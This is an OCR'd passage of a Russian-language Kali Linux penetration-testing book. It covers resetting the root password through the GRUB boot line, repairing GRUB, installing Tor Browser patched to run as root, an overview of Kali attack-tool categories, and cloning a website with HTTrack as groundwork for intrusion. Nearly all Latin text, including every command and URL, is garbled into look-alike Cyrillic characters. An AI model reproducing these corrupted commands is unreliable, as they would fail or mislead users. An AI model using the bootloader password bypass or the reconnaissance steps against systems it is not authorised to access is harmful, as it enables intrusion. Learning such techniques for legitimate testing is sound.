Ііпих /Ьоо1:/ѵтІіпиг-3.18 . 

В конце этой строки поставьте пробел и допишите (будьте внимательны, строка 
длинная и занимает 2 строчки): 

1| 

5Іп§Іе Іпі1:=/Ьіп/Ьа5б 
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27+сіеЬ7и2 


зеірагатз 'Каіі ЕІЧІІ/І-іпих, с ІЛпих 3.18.0-Ка 113^ашсі64' 

1оасІ_ѵісІео ѵ 

іпзтосі %т .іо . V 

іпзтосі рагідпзсіоз 
іпзтосі ехі2 

зеі гооТ=' (МсІО,тзсіозі) 1 

зеагсб —по-ііорру —ірз-ииісі --зеі=гооі Ь8915Ь5а-сІс1сІс-4сІ05-816с-бс38\ 
5а492і09 Як 

есііо 'Загружается ІЛпих 3.18.0-ка1іЗ-атсІ64 Я| х 

Ііпих /Ьооі/ѵтііпиг-З.18.0-ка1іЗ-атсІ64 гооі=ІІІЛ0=Ь8915Ь5а-ШсІс-4сІ05-\ 


816с-6с385а4| 
=/Ьіп/Ьазіі_ 
есЬо 'Загрунфе 
іпіігсі /Ьооі 



8р| гГ^ч .Щ чц 

ши 



зій^іе іпіі\ 


“Ше чиіеіег уои Ъесоте, Ше тоге уои аге аЫе Со Ьеаг” 


Т 


Міпітит Етасз-Ііке зсгееп есііііпё із зиррогіесі. ТАВ Іізіз 
сотріеііопз. Ргезз Сігі-х ог РІО іо Ьооі, Сігі-с ог Р2 іог 
а соттапсі-ііпе ог Е8С іо сіізсагсі есіііз апсі геіигп іо іііе 6КІІВ 

тепи. лЛ 


Нажимаете РІО для загрузки. 
Откроется окно терминала: 


еагіу сопзоіе іи Лесотргезз_кегпе1 

Весотргеззіпд ІЛпих... Рагзіпд ЕЬЕ . . . Лопе. 

Вооііпд ѢЬе кегпеі. 

ЬоаЛіпд, ріеазе иаіі... 

[ 3.746Ѳ95І тісгосоЛе: СРІІѲ ирЛаіе іо геѵізіоп ѲхІЬ ГаіІеЛ 

[ 3.7464Ѳ7] тісгосойе: СРІІ1 ирЛаіе іо геѵізіоп ѲхІЬ ГаіІеЛ 

ЬазЬ : саппоі зеі іегтіпаі ргосезз дгоир (-1): Іпарргоргіаіе іосіі Гог Леоісе 

ЬазЬ : по ,іоЪ сопігоі іп іЬіз зЬеІІ 

гооіР(попе):/# 


Перемонтируем файловую систему для чтения-записи (при загрузке она доступна 
только для чтения): 


1| 

тоипі -гѵѵ -о гетоипі / 

Теперь набираем команду: 

1| 

раззѵѵсі гооі 
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И придумываем новый пароль. 


еаг 1 у сопзоіе іп Лесотргезз_кегпе1 

Оесотргезз іпд ІЛпих... Рагзіпд ЕЬГ . . . Лопе. 

Вооѣіпд ѢЬе кегпеі. 
ѣоаЛіпд, ріеазе ыаіѣ... 

[ 3.746Ѳ95] тісгосоЛе: СРІІѲ ирЛаѣе ѣо геѵізіоп ѲхІЬ ГаіІеЛ 

[ 3.7464Ѳ7] тісгосоЛе: СРІІ1 ирЛаѣе ѣо геѵізіоп ѲхІЬ ГаіІеЛ 

ЬазЬ : саппоѣ зеѣ ѣегтіпаі ргосезз дгоир (-1): Іпарргоргіаѣе іосѣі Гог Леѵісе 

ЬазЬ : по ,іоЪ сопѣго 1 іп ѣіііз зііеіі 

гооѣе (попе ):/# тоипѣ -гы -о гетоипѣ / 

гооѣе (попе ): /В раззиЛ гооѣ 

Епѣег пеы ШІIX раззиогЛ: 

Кеѣуре пеы ѢІМIX раззыогЛ : 

раззыЛ : раззыогЛ ирЛаѣеЛ зиссеззРиІІу 

гооѣО (попе ): /В 


Всё готово, можно перезагружаться: 


1 


зііиісіоѵѵп -Іі по\л/ 


Способ работает не только для Каіі Ыпих, но и для многих других дистрибутивов. 
Обязательное требование — доступ к загрузчику ОКІІВ. 


Глава 12. Восстанавливаем 6КІІВ в Каіі Ыпих 
после обновления до \Л/іпсІоѵѵ5 10 

Автор статьи: АпсІгеуКгаѵеіз, первоначально статья опубликована по 
адресу Ніір://апсІгеѵ. Іѵіѵ.иа/Ыоа/гераіг-дгиЬ-каІІ-Ііпих-\л/ііІі-\л/іпсІо\л/5-10, другие статьи 
автора вы можете найти на сайте Ніір://апдгеу.Іѵіѵ. иа . 

Автор в социальной сети: +АпдгеуКгаѵеі5 . 

Привет всем! Недавно столкнулся с такой проблемой, как восстановление загрузчика 
ОКІІВ на ноуте с двумя операционками — ѴѴіпсІоѵѵз 10 и Каіі Ыпих. В интернете 
пришлось довольно долго искать необходимый мануал, поскольку с подобным мало 
кто сталкивается. В основном пишут о восстановлении СВІІВ в ІІЬипІи, а это не совсем 
подходит для Каіі. Поэтому решил поделиться своим опытом — возможно кому-то 
пригодится. 

Вообще-то две (а иногда и более) принципиально различных ОС на моих компьютерах 
уживаются уже несколько лет, ничего удивительного в этом нет. Главное сохранить 
правильную очередность при установке ОС. Сначала ставим винду, оставляя часть 
диска неразмеченным под Ыпих, а после уже устанавливаем и последнюю ОС. 
Загрузчик Ыпих-а при этом автоматически определяет, что установлена ѴѴіпсІоѵѵз или 
другая ОС и вам остается только выбирать при загрузке нужную систему. 

Так было до последнего времени и на новом ноуте — стояла ѴѴіпсІоѵѵз 8.1 и Каіі Ыпих. 
Все работало без проблем, пока не решил попробовать новую ѴѴіпсІоѵѵз 10 (инсайдер- 


По материалам сайта ѴѴеЬѴѴаге.Ьіі 


68 












Тестирование на проникновение с помощью Каіі Ыпих 2.0 


версию) для теста. Ее установил на место старой 8.1 при этом хитрая форточка, как 
всегда, перезаписала загрузчик СКІШ. Переустанавливать Каіі Ыпих не хотелось, 
поскольку там было сделано достаточно много настроек и наработок. Поэтому 
пришлось искать другой выход. 


Для восстановления загрузчика нам понадобится ЫѵеСО версия линукс, установленная 
на оптический диск, или изЬ носитель. Загружаемся с нашего носителя в обычном 
режиме, открываем консоль. Если вы не помните на каком разделе у вас стоит Ыпих, 
следует сначала воспользоваться командой: 


1| 

Тсіізк -1 

Которая выведет на экран таблицу ваших разделов. Что-то примерно следующего 
содержания: 

1| 

/сіеѵ/зсіаі 29 8369 66999082+ 83 Ыпих 

21 

/с)еѵ/5СІа2 * 8370 13995 45190845 7 НРР5/ЫТР5 

3| 

/сІеѵ/зсІаЗ 13996 14593 4803435 5 ЕхіепсЫ 


Видим, что наша Ыпих стоит в разделе / сіеѵ / зсіаі 


Далее можем выполнять следующие команды (обращайте внимание на каком разделе 
у вас стоит Ыпих, его и подставляете вместо зсіаі): 


1| 

тоипі /сіеѵ/зсіаі /тпі 

21 

тоипі --ЬіпсІ /сіеѵ /тпі/сіеѵ 

3| 

тоипі -ЬіпсІ /сіеѵ/різ /тпі/сІеѵ/рі5 

4| 

тоипі -ЬіпсІ /ргос /тпі/ргос 

51 

тоипі: -ЬіпсІ /зуз /тпі/зуз 

6| 

сЬгооі /тпі 

71 

ёгиЬ-іпзТаII /сІеѵ/$сІа 

81 

ирс!а1:е-§гиЬ 

91 

ехіі: 

10| 

итоипі: /тп1:/сІеѵ/р1:5 

111 

итоиЩ /тпі/сіеѵ 

121 

итоипі: /тп1:/ргос 

131 

итоипі /тпі/зуз 

141 

итоипі /тпі 


Все! Делаем геЬооі и наблюдаем знакомое меню выбора ОС. Если вдруг пункт 
ѴѴіпсІоѵѵз в нем отсутствует (что очень маловероятно), выполняем в консоли под гооТ- 
ом еще одну команду: 


1| 

05-ргоЬег 

2 1 

ирс!аіе-§гиЬ 
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Глава 13. Повышаем свою анонимность в Интернете 

с Тог в Каіі Ыпих 

Тог (ТНе Опіоп Коиіег) — свободное программное обеспечение для реализации 
второго поколения так называемой "луковой маршрутизации". Это система, 
позволяющая устанавливать анонимное сетевое соединение, защищённое от 
прослушивания. Рассматривается как анонимная сеть, предоставляющая передачу 
данных в зашифрованном виде. (Определение из Википедии) 

Несмотря на то, что название произошло от акронима, принято писать "Тог", а не 
"ТОК". Только первая буква — заглавная. 

Тог является свободным программным обеспечением и открытой сетью, в помощь вам 
для защиты от сетевого надзора, известного как анализ трафика, угрожающего 
персональной свободе и приватности, конфиденциальности бизнес контактов и связей, 
и государственной безопасности. ( Определение с сайта программы ) 

Таким образом. Тог — это не только программное обеспечение, но и распределенная 
система серверов, между которыми трафик проходит в зашифрованном виде. (Иногда 
серверы системы Тог называют нодами.) На последнем сервере-ноде в цепочке 
передаваемые данные проходят процедуру расшифровки и передаются целевому 
серверу в открытом виде. Кроме того, через заданный интервал времени (около 10 
минут) происходит периодическая смена цепочки (изменение маршрута следования 
пакетов). При таком подходе вскрыть канал можно только при взломе всех серверов 
цепочки, что практически нереально, т.к. они располагаются в разных странах, а сама 
цепочка постоянно меняется. По состоянию на апрель 2011 года сеть Тог включает 
более 2500 нодов, разбросанных по всем континентам Земли. Все ноды работают по 
протоколу 50СК5. 

Шифрование производится следующим образом. Перед отправлением пакет 
последовательно шифруется тремя ключами: сначала для третьей ноды, потом для 
второй и, в конце концов, для первой. Когда первая нода получает пакет, она 
расшифровывает "верхний" слой шифра и узнает, куда отправить пакет дальше. Второй 
и третий серверы поступают аналогичным образом. Именно эти слои шифрования и 
напомнили авторам луковицу (Опіоп). Оттуда и пошли название и логотип. 

О поддержке проекта Тог объявила известная организация по защите гражданских 
свобод Еіесігопіс Ргопбег Роипбабоп, которая начала активно пропагандировать новую 
систему и прилагать значительные усилия для максимального расширения сети нод. 

Сейчас многие общественные организации поддерживают разработку Тог, поскольку 
видят в нём механизм для защиты базовых гражданских прав и свобод в Интернете. 

Наиболее часто звучащими обвинениями в адрес сети Тог является возможность 
ее использования в преступных целях. Но в реальности компьютерные преступники 
гораздо чаще используют для этого средства собственного изготовления, будь то ѴРІ\І, 
взломанные сети, беспроводная связь или другие способы. 

Тог может работать не только с веб-браузерами, но и со многими 
существующими приложениями на основе протокола ТСР. Приложения для работы в 
Сети, в простейшем случае это браузер, необходимо ещё настроить на работу с Тог. 

Система Тог позволяет скрывать от провайдера конечные (целевые) адреса, тем 
самым, прорывая возможную блокаду доступа к заблокированным им сетевым 
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ресурсам. Также система Тог надёжно скрывает от целевых ресурсов адрес 
отправителя. 

Однако Тог допускает перехват самого содержимого сообщений (без выявления 
отправителя) из-за необходимости их расшифровки на выходном узле! Впрочем, для 
такого перехвата нужно поставить на выходных узлах анализатор трафика (сниффер), 
что не всегда просто сделать. Особенно, если учесть, что выходные узлы постоянно 
меняются. 

Как известно — никакая система не может быть безопасной на 100%. 
Сообщество разработчиков Тог постоянно анализирует возможные способы 
деанонимизации ее клиентов (т.н.атаки) и ищет способы борьбы с ними. 

Ещё одним достоинством Тог является то, что это свободное программное 
обеспечение. Т.е. распространение его полностью бесплатно и с открытым исходным 
кодом. 

Проект Тог является некоммерческой (благотворительной) организацией, 
поддерживающей и развивающей программное обеспечение Тог. 

Изначально система Тог разрабатывалась в лаборатории ВМС США по федеральному 
заказу. 

В 2002 г. разработка была рассекречена, а исходные коды были переданы 
независимым разработчикам, которые создали клиентское ПО и опубликовали 
исходный код под свободной лицензией, чтобы все желающие могли проверить его на 
отсутствие багов и прочих уязвимостей. (По заявлению разработчиков системы — к 
январю 2009 года число багов стало равным нулю.) 

Установка "нового" Тог Вгоѵѵзег в КаМ Ыпих 


Тог можно установить из репозиториев Ыпих, либо скачать с официального сайта самую 
свежую версию. Минус ручной установки в Каіі Ыпих — необходимо отредактировать 
одну строчку (поскольку Тог не хочет запускаться из-под рута, а в Каіі Ыпих рут — это 
пользователь по умолчанию). Чтобы чуть убыстрить процесс, я сделал такую большую 
команду: 


Для 64-битной версии 


1 


(Т='си гі -5 Ы:1:р5://\л/\л/\л/.1:огрго]ес1:.ог§/с!о\л/пІоасІ/сІо\л/пІоас1-еа5у.Ы:тІ.еп#Ііпих | §гер -Е - 
о '/сІІ5І:/і:огЬгоѵѵ5ег/[0-9]{1}.[0-9]{1}.[0-9]{1}/і:ог-Ьгоѵѵ5ег-Ііпих64-[0-9]{1}.[0-9]{1}.[0- 
9]{1}_' | ИеасІ -1'; 1:=" Ы:1:р5://ѵѵѵѵ\л/.1:огрго]ес1:.о г§"$1:"ги.Таг.хг"; \л/§е1: $1) && Таг -хѵі" Тог- 
Ьго\л/зег-Ііпихб4-* && зесі -і 'з/и'" -ец 0/и'" -ец 1/’ .Дог-Ьго\л/зег_ги/Вго\л/зег/з1:аг1:-1:ог- 
Ьгоѵѵзег && сЬоѵѵп -В гооТ .Дог-Ьго\л/зег_ги/* && .Дог-Ьго\л/5ег_ги/Вго\л/5ег/5ТагТ-1:ог- 
Ьгоѵѵзег 


Для 32-битной версии 


1 


(Т='сигі -5 Ы:1:р5://\л/\л/ѵѵ.1:огрго]ес1:.ог§/сІо\л/пІоасІ/сІоѵѵпІоасІ-еа5у.Ы:тІ.еп#Ііпих | §гер -Е - 
о ’/сіІ5І:ДогЬго\л/5ег/[0-9]{1}.[0-9]{1).[0-9]{1}Дог-Ьго\л/5ег-Ііпих32-[0-9]{1}.[0-9]{1}.[0- 
9]{1}_' | НеасІ -1'; Т="Ы:1:р5://\л/\л/\л/.1:огрго]ес1:.ог§"$1:"ги.1:аг.хг"; \л/§е 1: $1) && іаг -хѵі" Тог- 
Ьго\л/5ег-Ііпих32-* && зесі -і ’з/и'" -ец 0/и'" -ец I/ 1 .Дог-Ьго\л/зег_ги/Вго\л/зег/з1:агТ-1:ог- 
Ьгоѵѵзег && сііоѵѵп -В гооТ .Дог-Ьго\л/зег_ги/* && .Дог-Ьго\л/зег_ги/Вго\л/зег/з1:агТ-1:ог- 
Ьгоѵѵзег 
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Эта команда: 

• проверит самую свежую версию Тог 

• скачает её 

• распакует 

• отредактирует файл, как это описано ниже 

• сделает файлы исполнимыми 

• запустит Тог 

Если по каким-либо причинам команда не сработала, то напишите об этом в 
комментариях или можете перейти к полностью ручной установке. Шаги описаны 
ниже. Если команда отработала как надо, то пропускаете следующие шаги и 
переходите сразу к редактированию файла зІагМог-Ьгоѵѵзег. 

Идем на страницу ННрз://\м\м\м.1:огргоіес1:.огя/ёоѵѵпІоаё/ёоѵѵпІоаё-еа5ѵ.Ні:тІ.еп#Ііпих. 
выбираем русский язык, 32- или 64-битную версию и скачиваем её (на момент 
написания 1:ог-Ьго\л/5ег-Ііпих64-4.5.3_гіі.1:аг.х2), например на рабочий стол. 

Вводим последовательно в терминале: 


1| 

сё ОезкЕор 

21 

Еог-Ьго\л/зег-Ііпих64-4.5.3_ги.Еаг.х2 


После распаковки на рабочем столе появится папка Еог-Ьго\л/зег_гіі. Заходим в нее 
и открываем файл зІагМог-Ьгоѵѵзег с помощью текстового редактора І_еаЕраё. Ищем 
строку "Тбе Тог Вгоѵѵзег ВипсІІе зііоиіё поТ Ье гип аз пзоЕ. ЕхШп§.", а над ней в строке: 


1 


ІЕ [ ісі -и'" -ец 0 ]; ТИеп 


Меняем 0 на 1, то есть так: 


1 


іЕ [ "'ісі -и'" -ец 1 ]; ЕНеп 


Сохраняемся и выходим. 
Последовательно вводим в терминале: 


1| 

сё Еог-Ьго\л/зег_ги 

21 

сНоѵѵп -К гооЕ * 

3| 

./Вгоѵѵзег/зЕагЕ-Еог-Ьгоѵѵзег 
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Как проверить работу Тог 


Чтобы проверить то, как Тог обеспечивает анонимность нужно зайти на один из 
сайтов, которые могут определять и высвечивать ІР-адрес и некоторые другие данные 
о пользователе. Список приведен ниже. 

Чтобы узнать свой настоящий ІР-адрес — можно зайти на один из этих сайтов, не 
включая Тог. (Например, Ы:1:р://2ір.ги или тестовую страницу сайта Тог — 
НіТрзУ/сНеск.ІюгргоіесСогй и т. д.) 


Можно узнать, введя в терминале: 


1 


\л/§еТ -ц -О - ір.аррзроСсот 


Запомнить свой ІР-адрес и начните проверку. 


Включите Тог и зайдите последовательно на несколько проверочных сайтов. Чтобы 
избежать ошибки, проверка ІР всегда должна выполнятся на ресурсах, 
гарантированно учитывающих разные нюансы. Т. е., если анонимность важна, то будет 
не лишним провериться в нескольких местах, не полагаясь на один сервис. Ниже 
приведены ссылки на самые надежные и информативные ресурсы: 


• Сайт содержит набор всевозможных тестов прокси сервера на анонимность, 
включая .Іаѵа-проверку ІіНрУ/ѵѵѵѵѵѵ.зііІІІізІіепег.асІсІг.сот/сІіескроіпи/іпсІех.БІіІтІ 

• Показывает ІР-адрес и (исходя из этого ІР) страну проживания, а также 
информацию о провайдере ННрУ/ѵѵѵѵѵѵ.апопѵтіге.пеІі/сиггепЫР.рНіітІ 

• Иі:1:р://2ір.ги/ — на сайте есть анонимайзер и другие полезные функции. 

• ННрУ/зтагЫр.пе!/ — можно узнать адреса НТТР и 50СК5 Ргоху 

• НіТрУ/ІеасІег.ги/зесиге/щНо.НітІ — хороший адрес для получения подробной 
информации о Вашем компьютере. Имеет сервис ѴѴЬоіз! 

• ННрУ/ір-уѵНоіз.пеІ:/ 

• Ьі:1:р://сІіеп1:пігее-ЫсІеір.сот/тар/\л/Ііа1:І5тѵір.рНр 

• НіТрУ/БтагЫр.пеіДооІз/йеоір 
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Если ни один из проверочных сайтов не высветил настоящий ІР-адрес, значит Тог 
обеспечил вашу анонимность. 


Часть 2. Обзор инструментов Каіі Ыпих 

Глава 14. Обзор разделов инструментов Каіі Ыпих 1.1.0. Краткая 
характеристика всех разделов 


Программ направленных на решение разнообразных задачи в Каіі Ыпих очень много, и 
хотя они сгруппированы по разделам, глаза всё равно разбегаются, особенно при 
первом знакомстве. 


Іггіогтаііоп СаіЬегіп§ 


Приложения Переход ф 1>-1 


Щ] Аудио и видео 
Графика 
^ Интернет 
4ЙЦ Любительское радио 
Ш»І Офис 

Программирование 
$0? Системные 
а Специальные 
§ Стандартные 
Электроника 
й Прочие 


возможности 


Тор 10 Бесигііу ТооІ5 


ІпГогтайоп ба^Ьегіпд 


ъ ѴиІпегаЬіІіТу Апаіузіз 
> <1?? 

зФ ѴѴеЬ АррІісаТіопз 

* ^ Раззѵѵоггі АМаскз 

> г. 

д \Л/ігеІе55 А«аскз 

> 

ЬМ ЕхрІоіТаТіоп Тооіз 


* <а. 


БпіГГіпд/БрооГіпд 


> н 

^ МаіпТаіпіпд Ассезз 
Реѵегзе Епдіпеегіпд 
БТгезз ТезТіпд 
13, Наггіѵѵаге Наскіпд 
^ Рогепзісз 
[і] Рерогйпд Тооіб 
БузТет Бегѵісез 


Ц ЭМБ АпаІузІ5 

> Ю5/ІР5 ЫепШсайоп 

> Ыѵе НозТ ИепТіГісаТіоп 

> Оу Ме*ѵѵогк Бсаппегз 

> ОБ Ріпдегргіпііпд 

> Оу ОБІІЧТ Апаіузіз 

> РоиТе Апаіузіз 

> Оу 5егѵісе Ріпдегргіпііпд 

> БМВ АпаІузІБ 

> 5МТР Апаіузіз 

> Оу 5ЫМР Апаіузіз 

> Оч 551. Апаіузіз 

> ТеІерЬопу Апаіузіз 

> Оч ТгаГГіс Апаіузіз 

ѴоІР Апаіузіз 
Оу ѴРЫ Апаіузіз 


Эти инструменты для разведки используются для сбора данных по целевой сети или 
устройствам. Инструменты охватывают от идентификаторов устройств до анализа 
используемых протоколов. 


ѴиІпегаЬіІііу Апаіузіз 
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Инструменты из этой секции фокусируются на оценке систем в плане уязвимостей. 
Обычно, они запускаются в соответствии с информацией, полученной с помощью 
инструментов для разведки (из раздела Іпіюгтаіаоп 0а1:Негіп§). 


\Л/еЬ АррІісаІіоп$ 



Эти инструменты используются для аудита и эксплуатации уязвимостей в веб-серверах. 
Многие из инструментов для аудита находятся прямо в этой категории. Как бы там ни 
было, не все веб-приложения направлены на атаку веб-серверов, некоторые из них 
просто сетевые инструменты. Например, веб-прокси могут быть найдены в этой 
секции. 


Ра55ѵѵогс1 АІІаскз 


Приложения Переход ^ [>Г] 

Каіі Ыпих 


Ь|!І Аудио и видео 
Графика 
Интернет 

69 Любительское радио 
||Ц Офис 

✓ Программирование 
(0^ Системные 

а Специальные возможности 
Стандартные 
у|} Электроника 
^ Прочие 


Гч Тор 10 Бесигііу 


О*, ІпГогтаІіоп ОаІИегіпд 

> 

% ѴиІпегаЬІІІТу Апаіувів 

> 

\Л/еЬ Арріісаііопв 

> 

РаззѵѵогсІ АІТаскз > 

Б)" ѴѴІгеІевв АПаскз 

> 

Ё& Ехріоііаііоп Тооів 

> 

22 БпіГГІпд/БрооГіпд 

> 

Маіпіаіпіпд Ассезз 

> 

Кеѵегзе Епдіпеегіпд 

> 

■>($■ Бігезз Тезііпд 

> 

Н НагФл/аге Наскіпд 

> 

^ рогепзісз 

> 

[ІЦіІ КерогТіпд Тооіз 

> 

Бузіет Бегѵісез 

> 


6 РУ Т 00І5 


Эта секция инструментов, главным образам имеющих дело с брутфорсингом 
(перебором всех возможных значений) или вычисления паролей или расшаривания 
ключей используемых для аутентификации. 
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\Л/ігеІе§5 Аиаскз 



Эти инструменты используются для эксплуатации уязвимостей найденных в 
беспроводных протоколах. Инструменты 802.11 будут найдены здесь, включая 
инструменты, такие как аігсгаск, аігтоп и инструменты взлома беспроводных паролей. 
В дополнение, эта секция имеет инструменты связанные также с уязвимостями ВРЮ и 
ВІиеіооіН. Во многих случаях, инструменты в этой секции нужно использовать с 
беспроводным адаптером, который может быть настроен Каіі в состояние 
прослушивания. 


Ехріоііаііоп ТооІ5 



§щ]] Аудио и видео 
Ж Графика 
Интернет 

Любительское радио 
ІвШ Офис 

Программирование 

Системные 

© Специальные возможности 
Стандартные 

тС 


Электроника 


Прочие 


о© 

Рэббѵѵогсі АПаскБ 
ѴѴігеІе55 АПаскз 


Ехріоііаііоп Т ооіб 


* & БпіГГіпд/БрооРіпд 

> рч 

^ Маіпіаіпіпд Асеева 
ВеѵегБе Епдіпеегіпд 
Бігевв Тевііпд 
ій Наггіѵѵаге Наскіпд 
• Рогѳпбісб 
I Рерогііпд Тооіб 
1*Т ^уБІет Бегѵісев 


ЧфА ВеЕР Х55 Ргатеѵѵогк 
и Сібсо АПаскБ 
С& Ехріоіі ОаІаЬаае 
& Ехріоіі йеѵеіортепі Тооіб 
ДО Меіавріоіі 
до Меіѵѵогк Ехріоііаііоп 
и Босіаі Епдіпеегіпд Тооікіі 


Эти инструменты используются для эксплуатации уязвимостей найденных в системах. 
Обычно уязвимости идентифицируются во время оценки уязвимостей (ѴиІпегаЬіІіТу 
Аззеззтепі:) цели. 
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БпіШпе апсі Броойпё 



Эти инструменты используются для захвата сетевых пакетов, манипуляции с сетевыми 
пакетами, создания пакетов приложениями и веб подмены (зрооЯп§). Есть также 
несколько приложений реконструкции ѴоІР 


Маіпіаіпіпё Ассезз 


Приложения Переход ^ [>І] 

Каіі Ыпих 


Йрі, Аудио и видео 
) Графика 
Интернет 

Любительское радио 
ІіШ Офис 

/ Программирование 
^0? Системные 

а Специальные возможности 
§/-, Стандартные 
Электроника 
іЁ Прочие 


ВЧ Тор 10 Зесигііу Тооів 

’ Оч ІпГогтаІіоп СаІИегіпд 
"^5 ѴиІпегаЬІІіТу Апаіузіа 

> 

оО МеЬ Арріісаііопг 
РаввѵѵогсІ Аиаскв 



Инструменты поддержки доступа (Маіп1;аіпіп§ Ассезз) используются как плацдарм и 
устанавливаются в целевой системе или сети. Обычное дело найти на 
скомпрометированных системах большое количество бэкдоров и других способов 
контроля атакующим, чтобы обеспечить альтернативные маршруты на тот случай, если 
уязвимость, которой воспользовался атакующий, будет найдена или устранена. 
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Кеѵегзе Еп§іпеегіп§ 


Приложения Переход 

Каіі Ыпих 


Й Аудио и видео 
Графика 
^ Интернет 
«в Любительское радио 
Ш Офис 

У Программирование 
® Системные 

в Специальные возможности 
§ - Стандартные 
фЙ Электроника 
^ Прочие 


Их Тор 10 Зесигііу Тооіз 


ІпГогтаІіоп СаІНегіпд 

> 

ѴиІпегаЬІІІЕу Апаіузіз 

> 

0 ф \А/еЬ Арріісаііопз 

> 

^ РаззѵѵогсІ Аиаскз 

> 

5 )'* ѴѴІгеІезз АПаскз 

> 

ДО Ехріоііаііоп Тооів 

> 

(22 5піГГІпд/5рооГіпд 

> 

Ц Маіпіаіпіпд Ассевз 

> 

$5 Веѵегзе Епдіпеегіпд > 

Бігезз Тезііпд 

> 

Д Нагбѵѵаге Наскіпд 

> 

^ Еогепзісз 

> 

ЦІ Верогбіпд Тооів 

> 

Бузіет Бегѵісев 

> 


ОеЬиддегз 
ОізаззетЫу 
Мівс КЕ Тооів 


Эти инструменты используются для модификации, анализа, отладки (беЬи§) программ. 
Цель обратной инженерии — это анализ как программа была разработана, 
следовательно, она может быть скопирована, модифицирована, использована для 
развития других программ. Обратная инженерия также используется для анализа 
вредоносного кода, чтобы выяснить, что исполняемый файл делает, или попытаться 
исследователями найти уязвимости в программном обеспечении. 


ЗІТ655 Тезііпе 



Инструменты для стресс тестинга (Зігезз Тез1;іп§) используются для вычисления как 
много данных система может «переварить». Нежелательные результаты могут быть 
получены от перегрузки системы, такие как стать причиной открытия всех 
коммуникационных каналов устройством контроля сети или отключения системы 
(также известное как атака отказа в обслуживании). 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Нагсіѵѵаге Наскш§ 


Приложения Переход % ЕІ] 


!§|:' Аудио и видео 
Ж Графика 
Интернет 

Любительское радио 
ІіШ Оср 
Д Программирование 
0 Системные 

а Специальные возможности 
Стандартные 
^0 Электроника 
2% Прочие 


Гч Тор 10 БесигіТу Тооів 

* Ск ІпГогтаІіоп СаІМегіпд 

> ъ ѴиІпегаЬІІіІу Апаіузіз 

> л» 

оО ѴѴеЬ Арріісаііопз 



Эта секция содержит инструменты для АпсІгоісІ, которые могут быть классифицированы 
как мобильные и инструменты АпсІгоісІ, которые используются для программирования 
и контроля маленьких электронных устройств 

РОГѲП5ІС5 



Инструменты криминалистики (Рогепзісз) используются для мониторинга и анализа 
компьютера, сетевого трафика и приложений. 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


РерогІіпеТооІз 



Инструменты для отчётов (Керог1:іп§ іооіз) — это методы доставки информации, 
найденной во время исполнения проникновения. 


5у5Іет Бегѵісез 


Приложения Переход [>Г] 

Каіі Ыпих 


Цщ| Аудио и видео 
м Графика 
^ Интернет 
вШ Любительское радио 
М Офис 

У Программирование 
0 Системные 

О Специальные вовможности 


Рч Тор 10 Бесигііу Тооів 


§ Стандартные 
Электроника 
Дй Прочие 



* Оч ІпГогтаТіоп баІЬегіпд 

ІЯ ѴиІпегаЬІІІІу Апаіувів 

> да 

оО \Л/еЬ Арріісаііопв 

* ^ РаввѵѵогсІ АПаскз 

д) 1 ' \Л/ігеІе55 АНаскв 
ЬЛ Ехріоііабоп Тооів 

* <а 5піРРІпд/5рооРіпд 

> 

м МаіпГаіпіпд Ассевв 
Кеѵегве Епдіпеегіпд 
ЗТгевв Тевііпд 
)Д Нагбѵѵаге Наскіпд 
Рогеп$ІС5 

|Ц] Яерогііпд Тооів 



Здесь вы можете включить или отключить сервисы Каіі. Сервисы сгруппированы в ВеЕР, 
Огасііз, НИР, МеТазрІоіІ;, Му5ЦІ_, и 55Н. 
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В сборку Каіі Ыпих включены также и другие инструменты, например, веб-браузеры, 
быстрые ссылки на тюнинг сборки Каіі Ыпих, которые можно увидеть в других разделах 
меню (сеть, инструменты поиска и другие полезные приложения). 


Глава 15. Обзор разделов инструментов Каіі Ыпих 1.1.0. Часть 2. 
Инструменты для сбора информации 


Здесь обзор только НЕКОТОРЫХ утилит. На самом деле, программ намного-намного 
больше. Мы обходим стороной такие вопросы, как использование для сбора 
информации данных, например, полученных через запросы в Гугл, анализ истории 
сайта в веб-архивах, анализа доступной информации (объявления о приёме на работу 
и т. д.), использование базовых утилит для пинга и определение маршрутов. Это всё 
важно, и это нужно изучать отдельно! Но непосредственно к Каіі Ыпих это не имеет 
прямого отношения, поэтому данные вопросы пропущены. 


1. НТТгаск - клонируем веб-сайт 

Данная программа сохраняет копию веб-сайта на жёсткий диск. Понятно, что она не 
сможет скачать скрипты РНР и базы данных. Но анализируя структуру каталогов, 
размещения страниц и пр. можно сделать определённые выводы, которые будут 
способствовать разработке стратегии проникновения. 


Эта программа установлена не на всех версиях Каіі Ыпих, если у вас её нет, то наберите 
в командной строке: 


1 


арТ-§е1: іпзТаІ I ЫТгаск 


Теперь там же, в терминале, создаём каталог для нашего нового сайта, переходим в 
этот каталог и запускаем НТТгаск: 


1| 

тксііг ѵѵеЬѵѵаге.Ьіі 

2 1 

ссі / \л/еЬ\л/аге.ЬІ 2 

3| 

ЫТгаск 


гооі(§)каи-тіаІ: / 

Файл Правка Вид Поиск Терминал Справка 


:~# тксііг \л/ѳЬ\л/а ге . Ьіг 
: —# ссі / \л/еЬ\л/а ге . Ьіг 
:/# НІ'Егаск 

іп/еісоте іо НТТгаск Ѵѵ/еЬзіІе Соріег (01-П.іпе Вгоѵ/зег) 3.46+1іЬП1:зз аѵа . зо . 2 

СоругідЫ: (С) Хаѵіег КосЬе апсі оТНѳг сопИ гіЬиНогз 

То зее 1Ье орііоп ИзТ , епіег а Ыапк 1±пе ог I гу Ыігаск --Ьеір 

Епіег ргозесі: пате 
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Задаём имя проекта, базовый каталог, вводим ІІРЯ (адрес сайта) — адрес сайта может 
быть любым, ѴѴеЬѴѴаге.Ыг взят только для примера, и нам на выбор предоставляется 
несколько опций: 



1| 

1. Создать зеркало сайта (сайтов) 

2 1 

2. Создать зеркало сайта (сайтов) с мастером 

3| 

3. Просто получить указанные файлы 

4| 

4. Сделать зеркало всех ссылок в ІІРЯ 

5 1 

5. Протестировать ссылки в ІІВІ. (Тест закладок) 

6| 

0. Выход 


Самая простая опция — вторая. У нас спрашивают о прокси. Далее спрашивается, какие 
файлы мы хотим скачать — чтобы скачать всё, поставьте звёздочку (*), мы можем 
задать дополнительные опции (ключи) — я не стал это делать и, наконец, у нас 
спрашивают, готовы ли мы начать: 


гоо(@каІі-тіаІ: / 

Файл Правка Вид Поиск Терминал Справка 


АсТіоп : 
(епТег) 1 
2 

3 

4 

5 
0 

: 2 


Міггог Ѵі/еЬ 5іТе(з) 

